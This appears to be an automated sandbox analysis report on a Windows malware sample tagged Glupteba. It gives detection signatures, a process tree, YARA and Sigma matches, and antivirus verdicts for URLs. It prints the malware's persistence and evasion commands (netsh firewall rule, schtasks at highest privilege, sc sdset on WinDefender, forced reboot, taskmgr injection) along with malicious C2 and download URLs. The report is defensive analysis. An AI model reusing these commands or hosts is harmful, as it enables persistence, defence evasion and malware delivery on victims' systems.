Loading ...

Play interactive tourEdit tour

Windows Analysis Report f6oNLRKHUy.exe

Overview

General Information

Sample Name:f6oNLRKHUy.exe
Analysis ID:506223
MD5:3c3046f640f7825c720849aaa809c963
SHA1:61ae00ec8041de7826deceb176c495ab23392efb
SHA256:3993aa1a1cf9ba37316db59a6ef67b15ef0f49fcd79cf2420989b9e4a19ffc2a
Tags:exeGlupteba
Infos:

Most interesting Screenshot:

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Machine Learning detection for sample
Creates files in the system32 config directory
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to inject threads in other processes
Performs DNS TXT record lookups
Sigma detected: Suspicious Service DACL Modification
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Enables security privileges
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Netsh Port or Application Allowed
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • f6oNLRKHUy.exe (PID: 6976 cmdline: 'C:\Users\user\Desktop\f6oNLRKHUy.exe' MD5: 3C3046F640F7825C720849AAA809C963)
    • f6oNLRKHUy.exe (PID: 7112 cmdline: C:\Users\user\Desktop\f6oNLRKHUy.exe MD5: 3C3046F640F7825C720849AAA809C963)
      • cmd.exe (PID: 6196 cmdline: C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • netsh.exe (PID: 5832 cmdline: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)
      • csrss.exe (PID: 6272 cmdline: C:\Windows\rss\csrss.exe '' MD5: 3C3046F640F7825C720849AAA809C963)
        • schtasks.exe (PID: 1516 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6320 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 5468 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 956 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 6352 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 6608 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • shutdown.exe (PID: 6848 cmdline: shutdown -r -t 5 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)
          • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • injector.exe (PID: 3576 cmdline: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll MD5: D98E33B66343E7C96158444127A117F6)
          • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • windefender.exe (PID: 6644 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)
          • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 1360 cmdline: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • sc.exe (PID: 6440 cmdline: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • TrustedInstaller.exe (PID: 7076 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: 4578046C54A954C917BB393B70BA0AEB)
  • svchost.exe (PID: 6172 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • csrss.exe (PID: 5432 cmdline: C:\Windows\rss\csrss.exe MD5: 3C3046F640F7825C720849AAA809C963)
    • csrss.exe (PID: 6460 cmdline: C:\Windows\rss\csrss.exe MD5: 3C3046F640F7825C720849AAA809C963)
  • csrss.exe (PID: 6864 cmdline: 'C:\Windows\rss\csrss.exe' MD5: 3C3046F640F7825C720849AAA809C963)
    • csrss.exe (PID: 6972 cmdline: C:\Windows\rss\csrss.exe MD5: 3C3046F640F7825C720849AAA809C963)
  • svchost.exe (PID: 1340 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3640 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • csrss.exe (PID: 6128 cmdline: 'C:\Windows\rss\csrss.exe' MD5: 3C3046F640F7825C720849AAA809C963)
    • csrss.exe (PID: 6496 cmdline: C:\Windows\rss\csrss.exe MD5: 3C3046F640F7825C720849AAA809C963)
  • windefender.exe (PID: 724 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)
  • svchost.exe (PID: 6556 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
          00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            31.2.csrss.exe.9a76e0.3.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x444b8:$s2: The Magic Word!
            • 0x505f8:$s2: The Magic Word!
            • 0x44818:$s3: Software\Oracle\VirtualBox
            • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            20.2.csrss.exe.9af2e0.2.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3c8b8:$s2: The Magic Word!
            • 0x489f8:$s2: The Magic Word!
            • 0x3cc18:$s3: Software\Oracle\VirtualBox
            • 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            16.2.csrss.exe.9a76e0.3.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x444b8:$s2: The Magic Word!
            • 0x505f8:$s2: The Magic Word!
            • 0x44818:$s3: Software\Oracle\VirtualBox
            • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            1.2.f6oNLRKHUy.exe.9ad080.2.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3eb18:$s2: The Magic Word!
            • 0x4ac58:$s2: The Magic Word!
            • 0x3ee78:$s3: Software\Oracle\VirtualBox
            • 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            1.2.f6oNLRKHUy.exe.9af2e0.3.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3c8b8:$s2: The Magic Word!
            • 0x489f8:$s2: The Magic Word!
            • 0x3cc18:$s3: Software\Oracle\VirtualBox
            • 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            Click to see the 31 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: System File Execution Location AnomalyShow sources
            Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Windows\rss\csrss.exe '', CommandLine: C:\Windows\rss\csrss.exe '', CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\f6oNLRKHUy.exe, ParentImage: C:\Users\user\Desktop\f6oNLRKHUy.exe, ParentProcessId: 7112, ProcessCommandLine: C:\Windows\rss\csrss.exe '', ProcessId: 6272
            Sigma detected: Suspicious Service DACL ModificationShow sources
            Source: Process startedAuthor: Jonhnathan Ribeiro, oscd.community: Data: Command: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1360, ProcessCommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ProcessId: 6440
            Sigma detected: Netsh Port or Application AllowedShow sources
            Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, CommandLine: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6196, ProcessCommandLine: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, ProcessId: 5832
            Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\rss\csrss.exe '', CommandLine: C:\Windows\rss\csrss.exe '', CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\f6oNLRKHUy.exe, ParentImage: C:\Users\user\Desktop\f6oNLRKHUy.exe, ParentProcessId: 7112, ProcessCommandLine: C:\Windows\rss\csrss.exe '', ProcessId: 6272

            Persistence and Installation Behavior:

            barindex
            Sigma detected: Schedule system processShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe '', ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 6272, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, ProcessId: 1516

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: f6oNLRKHUy.exeMetadefender: Detection: 31%Perma Link
            Source: f6oNLRKHUy.exeReversingLabs: Detection: 52%
            Antivirus detection for URL or domainShow sources
            Source: https://server12.trumops.com/bots/post-ia-data?uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460Avira URL Cloud: Label: malware
            Source: https://server12.trumops.com/api/pollserver12.trumops.comAvira URL Cloud: Label: malware
            Source: https://logs.trumops.comAvira URL Cloud: Label: malware
            Source: https://server12.trumops.com/api/cdn?c=177c2a906396ff21&uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460Avira URL Cloud: Label: malware
            Source: https://trumops.comAvira URL Cloud: Label: malware
            Source: http://gohnot.com/0281c43f36eb9f47aab5357d48bbc076/watchdog.exeAvira URL Cloud: Label: malware
            Source: https://server12.trumops.com/api/pollAvira URL Cloud: Label: malware
            Source: https://trumops.com/api/install-failureinvalidAvira URL Cloud: Label: malware
            Source: http://gohnot.com/0281c43f36eb9f47aab5357d48bbc076Avira URL Cloud: Label: malware
            Source: https://server12.trumops.comAvira URL Cloud: Label: malware
            Source: http://newscommer.com/app/app.exeURL Reputation: Label: malware
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllMetadefender: Detection: 45%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllReversingLabs: Detection: 59%
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeMetadefender: Detection: 13%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeReversingLabs: Detection: 73%
            Source: C:\Windows\rss\csrss.exeMetadefender: Detection: 31%Perma Link
            Source: C:\Windows\rss\csrss.exeReversingLabs: Detection: 52%
            Source: C:\Windows\windefender.exeMetadefender: Detection: 28%Perma Link
            Source: C:\Windows\windefender.exeReversingLabs: Detection: 57%
            Machine Learning detection for sampleShow sources
            Source: f6oNLRKHUy.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped fileShow sources
            Source: C:\Windows\rss\csrss.exeJoe Sandbox ML: detected
            Source: 8.2.csrss.exe.11c06000.10.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 8.2.csrss.exe.11b86000.9.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: f6oNLRKHUy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
            Source: Binary string: Loader.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdb source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627870906.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.390880568.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.392824484.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.406627827.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.408434896.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.428005891.0000000000C57000.00000040.00020000.sdmp
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
